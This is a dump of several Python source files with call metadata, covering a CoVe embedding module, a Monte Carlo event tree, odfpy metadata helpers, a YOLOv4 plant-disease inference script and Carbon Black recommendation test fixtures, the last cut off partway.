return h[-1]
else:
return h.transose(0, 1).contiguous().view(x.size(0), -1)
#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
def __init__(self, model_path, padding_idx=0):
super(ContextualEmbedV2, self).__init__()
state_dict = torch.load(model_path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
pass
def forward(self, x, x_mask):
"""A pretrained MT-LSTM (McCann et. al. 2017).
"""
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
class ContextualEmbed(nn.Module):
def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
super(ContextualEmbed, self).__init__()
self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
if embedding is not None:
self.embedding.weight.data = embedding
state_dict = torch.load(path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx)
self.eval_embed.weight.data = eval_embed
for p in self.eval_embed.parameters():
p.requires_grad = False
def forward(self, x_idx, x_mask):
emb = self.embedding if self.training else self.eval_embed
x_hiddens = emb(x_idx)
lengths = x_mask.data.eq(0).long().sum(1)
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
| [((74, 21, 74, 43), 'torch.load', 'torch.load', ({(74, 32, 74, 42): 'model_path'}, {}), '(model_path)', False, 'import torch\n'), ((75, 20, 75, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((76, 20, 76, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((94, 24, 94, 52), 'torch.sort', 'torch.sort', ({(94, 35, 94, 42): 'lengths', (94, 44, 94, 45): '0', (94, 47, 94, 51): 'True'}, {}), '(lengths, 0, True)', False, 'import torch\n'), ((100, 22, 100, 44), 'torch.sort', 'torch.sort', ({(100, 33, 100, 40): 'indices', (100, 42, 100, 43): '0'}, {}), '(indices, 0)', False, 'import torch\n'), ((111, 25, 111, 83), 'torch.nn.Embedding', 'nn.Embedding', (), '', True, 'import torch.nn as nn\n'), ((115, 21, 115, 37), 'torch.load', 'torch.load', ({(115, 32, 115, 36): 'path'}, {}), '(path)', False, 'import torch\n'), ((116, 20, 116, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((117, 20, 117, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((137, 24, 137, 52), 'torch.sort', 'torch.sort', ({(137, 35, 137, 42): 'lengths', (137, 44, 137, 45): '0', (137, 47, 137, 51): 'True'}, {}), '(lengths, 0, True)', False, 'import torch\n'), ((143, 22, 143, 44), 'torch.sort', 'torch.sort', ({(143, 33, 143, 40): 'indices', (143, 42, 143, 43): '0'}, {}), '(indices, 0)', False, 'import torch\n'), ((98, 18, 98, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n'), ((99, 18, 99, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n'), ((141, 18, 141, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n'), ((142, 18, 142, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n')] |
vlcekl/kmcpy | kmcsim/sim/events_old.py | b55a23f64d4b6d2871671f4a16346cc897c4a2a5 | #!//anaconda/envs/py36/bin/python
#
# File name: kmc_pld.py
# Date: 2018/08/03 09:07
# Author: Lukas Vlcek
#
# Description:
#
import numpy as np
from collections import Counter
class EventTree:
"""
Class maintaining a binary tree for random event type lookup
and arrays for choosing specific event.
"""
def __init__(self, rates, events):
self.rates = rates
self.events = events
self.__setup()
def __build_tree(self, e_ratio):
self.event_tree = []
# create event ratio array level 0 - bottom
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
# create the bottom level (rates*numbers)
self.event_tree.append(np.array(e_ratio))
# create partial summs (iteratively) up to the 2nd highest level
while len(e_ratio) > 2:
e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
self.event_tree.append(np.array(e_ratio))
# create top level = sum of all rates
self.event_tree.append(np.array(sum(e_ratio)))
def __setup(self):
# Get dictionary of event type counts
e_counts = Counter([e['type'] for e in self.events])
print(e_counts)
# create a list of events based on event types
self.event_counts = [[] for _ in range(len(self.rates))]
for e in self.events:
self.event_counts[e['type']].append(e)
e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
print('e_ratio', e_ratio)
self.__build_tree(e_ratio)
def update_events(self, old_events, new_events):
"""
Update tree: remove old events and add new events
"""
pass
def find_event(self):
"""Find and return an event"""
# generate a random number [0,Rs)
q = self.Rs*np.random.random()
# cycle through levels (top->down)
# start with top-level child (k-2) end with level above bottom (1)
j = 0
for k in range(len(self.event_tree)-2, 0, -1):
# left child value
left = self.event_tree[k][j]
if q < left:
j = 2*j
else:
q -= left
j = 2*j + 1
# bottom level - return selected event type
if q < self.event_tree[0][j]:
event_type = self.events[j]
else:
event_type = self.events[j+1]
# select a random event index of a given type
event_number = np.random.randint(len(self.event_counts[event_type]))
# get the event object
event = event_counts[event_type][event_number]
return event
| [((52, 19, 52, 60), 'collections.Counter', 'Counter', ({(52, 27, 52, 59): "[e['type'] for e in self.events]"}, {}), "([e['type'] for e in self.events])", False, 'from collections import Counter\n'), ((35, 31, 35, 48), 'numpy.array', 'np.array', ({(35, 40, 35, 47): 'e_ratio'}, {}), '(e_ratio)', True, 'import numpy as np\n'), ((77, 20, 77, 38), 'numpy.random.random', 'np.random.random', ({}, {}), '()', True, 'import numpy as np\n'), ((43, 35, 43, 52), 'numpy.array', 'np.array', ({(43, 44, 43, 51): 'e_ratio'}, {}), '(e_ratio)', True, 'import numpy as np\n')] |
anthowen/duplify | env/lib/python3.6/site-packages/odf/meta.py | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from odf.namespaces import METANS
from odf.element import Element
# Autogenerated
def AutoReload(**args):
return Element(qname = (METANS,'auto-reload'), **args)
def CreationDate(**args):
return Element(qname = (METANS,'creation-date'), **args)
def DateString(**args):
return Element(qname = (METANS,'date-string'), **args)
def DocumentStatistic(**args):
return Element(qname = (METANS,'document-statistic'), **args)
def EditingCycles(**args):
return Element(qname = (METANS,'editing-cycles'), **args)
def EditingDuration(**args):
return Element(qname = (METANS,'editing-duration'), **args)
def Generator(**args):
return Element(qname = (METANS,'generator'), **args)
def HyperlinkBehaviour(**args):
return Element(qname = (METANS,'hyperlink-behaviour'), **args)
def InitialCreator(**args):
return Element(qname = (METANS,'initial-creator'), **args)
def Keyword(**args):
return Element(qname = (METANS,'keyword'), **args)
def PrintDate(**args):
return Element(qname = (METANS,'print-date'), **args)
def PrintedBy(**args):
return Element(qname = (METANS,'printed-by'), **args)
def Template(**args):
args.setdefault('type', 'simple')
return Element(qname = (METANS,'template'), **args)
def UserDefined(**args):
return Element(qname = (METANS,'user-defined'), **args)
| [((26, 11, 26, 58), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((29, 11, 29, 60), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((32, 11, 32, 58), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((35, 11, 35, 65), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((38, 11, 38, 61), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((41, 11, 41, 63), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((44, 11, 44, 56), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((47, 11, 47, 66), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((50, 11, 50, 62), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((53, 11, 53, 54), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((56, 11, 56, 57), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((59, 11, 59, 57), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((63, 11, 63, 55), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((66, 11, 66, 59), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n')] |
Mr-TalhaIlyas/Scaled-YOLOv4 | scripts/my_inference.py | 2b0326a6bc1eba386eb1a78b56727dcf29c77bac | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange
print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns
from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes
# Initialize
device = select_device('')
half = device.type != 'cpu' # half precision only supported on CUDA
def prepare_input(img1, img_size=416, half=True):
img2 = cv2.resize(img1, (img_size, img_size)) # W x H
img2 = img2.transpose(2,0,1)
img2 = img2[np.newaxis, ...]
img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W
img2 = img2.half() if not half else img2.float()
img2 /= 255.0
return img2
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0,1,2,3,4,5]
class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite",
"spotting_disease", "snails_and_slugs"]
# deleting files in op_dir
filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ]
for f in tqdm(filelist, desc = 'Deleting old files fro directory'):
os.remove(os.path.join(out, f))
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
if half:
model.half() # to FP16
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
#%%
for i in trange(len(img_paths)):
path = img_paths[i]
img1 = cv2.imread(path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
# get file name
name = os.path.basename(path)[:-4]
# Inference
t1 = time_synchronized()
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
if pred[0] is not None:
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
else:
boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
all_bounding_boxnind = []
for i in range(boxes.shape[0]):
bounding_box = [0.0] * 6
bounding_box[0] = det_classes[i]
bounding_box[1] = confd[i]
bounding_box[2] = coords_xyminmax[i][0]
bounding_box[3] = coords_xyminmax[i][1]
bounding_box[4] = coords_xyminmax[i][2]
bounding_box[5] = coords_xyminmax[i][3]
bounding_box = str(bounding_box)[1:-1]# remove square brackets
bounding_box = bounding_box.replace("'",'')# removing inverted commas around class name
bounding_box = "".join(bounding_box.split())# remove spaces in between **here dont give space inbetween the inverted commas "".
all_bounding_boxnind.append(bounding_box)
all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))# convert list to string
all_bounding_boxnind=list(all_bounding_boxnind.split(' ')) # convert strin to list
# replacing commas with spaces
for i in range(len(all_bounding_boxnind)):
all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ')
for i in range(len(all_bounding_boxnind)):
# check if file exiscts else make new
with open(out +'{}.txt'.format(name), "a+") as file_object:
# Move read cursor to the start of file.
file_object.seek(0)
# If file is not empty then append '\n'
data = file_object.read(100)
if len(data) > 0 :
file_object.write("\n")
# Append text at the end of file
file_object.write(all_bounding_boxnind[i])
#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path),img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
print(det_classes[k], t[k], confd[k])
print('='*50) | [((4, 0, 4, 14), 'torch.rand', 'torch.rand', ({(4, 11, 4, 13): '(10)'}, {}), '(10)', False, 'import torch\n'), ((36, 9, 36, 26), 'utils.torch_utils.select_device', 'select_device', ({(36, 23, 36, 25): '""""""'}, {}), "('')", False, 'from utils.torch_utils import select_device, load_classifier, time_synchronized\n'), ((64, 9, 64, 66), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm, trange\n'), ((68, 8, 68, 50), 'models.experimental.attempt_load', 'attempt_load', (), '', False, 'from models.experimental import attempt_load\n'), ((75, 8, 75, 50), 'models.experimental.attempt_load', 'attempt_load', (), '', False, 'from models.experimental import attempt_load\n'), ((161, 11, 161, 35), 'random.choice', 'random.choice', ({(161, 25, 161, 34): 'img_paths'}, {}), '(img_paths)', False, 'import glob, random\n'), ((163, 8, 163, 28), 'cv2.imread', 'cv2.imread', ({(163, 19, 163, 27): 'img_path'}, {}), '(img_path)', False, 'import os, cv2\n'), ((164, 7, 164, 44), 'cv2.cvtColor', 'cv2.cvtColor', ({(164, 20, 164, 24): 'img1', (164, 26, 164, 43): 'cv2.COLOR_BGR2RGB'}, {}), '(img1, cv2.COLOR_BGR2RGB)', False, 'import os, cv2\n'), ((172, 7, 172, 87), 'utils.general.non_max_suppression', 'non_max_suppression', (), '', False, 'from utils.general import check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer\n'), ((175, 16, 175, 45), 'numpy.zeros', 'np.zeros', ({(175, 25, 175, 44): '(boxes.shape[0], 4)'}, {}), '((boxes.shape[0], 4))', True, 'import numpy as np\n'), ((176, 8, 176, 37), 'numpy.zeros', 'np.zeros', ({(176, 17, 176, 36): '(boxes.shape[0], 1)'}, {}), '((boxes.shape[0], 1))', True, 'import numpy as np\n'), ((177, 12, 177, 41), 'numpy.zeros', 'np.zeros', ({(177, 21, 177, 40): '(boxes.shape[0], 1)'}, {}), '((boxes.shape[0], 1))', True, 'import numpy as np\n'), ((189, 4, 189, 31), 'numpy.asarray', 'np.asarray', ({(189, 15, 189, 30): 'coords_xyminmax'}, {}), '(coords_xyminmax)', True, 'import numpy as np\n'), ((190, 5, 190, 92), 'my_utils.draw_boxes', 'draw_boxes', (), '', False, 'from my_utils import xyxy_2_xyxyo, draw_boxes\n'), ((191, 0, 191, 14), 'matplotlib.pyplot.imshow', 'plt.imshow', ({(191, 11, 191, 13): 'op'}, {}), '(op)', True, 'import matplotlib.pyplot as plt\n'), ((9, 6, 9, 31), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((10, 6, 10, 34), 'torch.cuda.get_device_name', 'torch.cuda.get_device_name', ({}, {}), '()', False, 'import torch\n'), ((11, 6, 11, 33), 'torch.cuda.current_device', 'torch.cuda.current_device', ({}, {}), '()', False, 'import torch\n'), ((41, 11, 41, 49), 'cv2.resize', 'cv2.resize', ({(41, 22, 41, 26): 'img1', (41, 28, 41, 48): '(img_size, img_size)'}, {}), '(img1, (img_size, img_size))', False, 'import os, cv2\n'), ((78, 12, 78, 86), 'glob.glob', 'glob.glob', ({(78, 22, 78, 85): '"""/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png"""'}, {}), "('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png')", False, 'import glob, random\n'), ((79, 12, 79, 86), 'glob.glob', 'glob.glob', ({(79, 22, 79, 85): '"""/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg"""'}, {}), "('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')", False, 'import glob, random\n'), ((89, 12, 89, 28), 'cv2.imread', 'cv2.imread', ({(89, 23, 89, 27): 'path'}, {}), '(path)', False, 'import os, cv2\n'), ((90, 11, 90, 48), 'cv2.cvtColor', 'cv2.cvtColor', ({(90, 24, 90, 28): 'img1', (90, 30, 90, 47): 'cv2.COLOR_BGR2RGB'}, {}), '(img1, cv2.COLOR_BGR2RGB)', False, 'import os, cv2\n'), ((97, 9, 97, 28), 'utils.torch_utils.time_synchronized', 'time_synchronized', ({}, {}), '()', False, 'from utils.torch_utils import select_device, load_classifier, time_synchronized\n'), ((101, 11, 101, 91), 'utils.general.non_max_suppression', 'non_max_suppression', (), '', False, 'from utils.general import check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer\n'), ((107, 20, 107, 49), 'numpy.zeros', 'np.zeros', ({(107, 29, 107, 48): '(boxes.shape[0], 4)'}, {}), '((boxes.shape[0], 4))', True, 'import numpy as np\n'), ((108, 12, 108, 41), 'numpy.zeros', 'np.zeros', ({(108, 21, 108, 40): '(boxes.shape[0], 1)'}, {}), '((boxes.shape[0], 1))', True, 'import numpy as np\n'), ((109, 16, 109, 45), 'numpy.zeros', 'np.zeros', ({(109, 25, 109, 44): '(boxes.shape[0], 1)'}, {}), '((boxes.shape[0], 1))', True, 'import numpy as np\n'), ((159, 12, 159, 86), 'glob.glob', 'glob.glob', ({(159, 22, 159, 85): '"""/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png"""'}, {}), "('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png')", False, 'import glob, random\n'), ((160, 12, 160, 86), 'glob.glob', 'glob.glob', ({(160, 22, 160, 85): '"""/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg"""'}, {}), "('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')", False, 'import glob, random\n'), ((193, 22, 193, 48), 'os.path.basename', 'os.path.basename', ({(193, 39, 193, 47): 'img_path'}, {}), '(img_path)', False, 'import os, cv2\n'), ((13, 32, 13, 57), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((19, 10, 19, 39), 'torch.cuda.get_device_name', 'torch.cuda.get_device_name', ({(19, 37, 19, 38): '(0)'}, {}), '(0)', False, 'import torch\n'), ((63, 24, 63, 39), 'os.listdir', 'os.listdir', ({(63, 35, 63, 38): 'out'}, {}), '(out)', False, 'import os, cv2\n'), ((65, 14, 65, 34), 'os.path.join', 'os.path.join', ({(65, 27, 65, 30): 'out', (65, 32, 65, 33): 'f'}, {}), '(out, f)', False, 'import os, cv2\n'), ((95, 11, 95, 33), 'os.path.basename', 'os.path.basename', ({(95, 28, 95, 32): 'path'}, {}), '(path)', False, 'import os, cv2\n'), ((186, 27, 186, 71), 'my_utils.xyxy_2_xyxyo', 'xyxy_2_xyxyo', ({(186, 40, 186, 45): 'img_w', (186, 47, 186, 52): 'img_h', (186, 54, 186, 70): 'coords_minmax[i]'}, {}), '(img_w, img_h, coords_minmax[i])', False, 'from my_utils import xyxy_2_xyxyo, draw_boxes\n'), ((44, 11, 44, 33), 'torch.from_numpy', 'torch.from_numpy', ({(44, 28, 44, 32): 'img2'}, {}), '(img2)', False, 'import torch\n'), ((118, 31, 118, 75), 'my_utils.xyxy_2_xyxyo', 'xyxy_2_xyxyo', ({(118, 44, 118, 49): 'img_w', (118, 51, 118, 56): 'img_h', (118, 58, 118, 74): 'coords_minmax[i]'}, {}), '(img_w, img_h, coords_minmax[i])', False, 'from my_utils import xyxy_2_xyxyo, draw_boxes\n'), ((21, 30, 21, 60), 'torch.cuda.memory_allocated', 'torch.cuda.memory_allocated', ({(21, 58, 21, 59): '(0)'}, {}), '(0)', False, 'import torch\n'), ((22, 30, 22, 59), 'torch.cuda.memory_reserved', 'torch.cuda.memory_reserved', ({(22, 57, 22, 58): '(0)'}, {}), '(0)', False, 'import torch\n'), ((105, 16, 105, 59), 'numpy.array', 'np.array', ({(105, 25, 105, 58): '[10.0, 20.0, 30.0, 50.0, 0.75, 0]'}, {}), '([10.0, 20.0, 30.0, 50.0, 0.75, 0])', True, 'import numpy as np\n'), ((83, 10, 83, 41), 'torch.zeros', 'torch.zeros', ({(83, 22, 83, 23): '(1)', (83, 25, 83, 26): '(3)', (83, 28, 83, 33): 'imgsz', (83, 35, 83, 40): 'imgsz'}, {}), '(1, 3, imgsz, imgsz)', False, 'import torch\n')] |
fslds/carbon-black-cloud-sdk-python | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | """Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
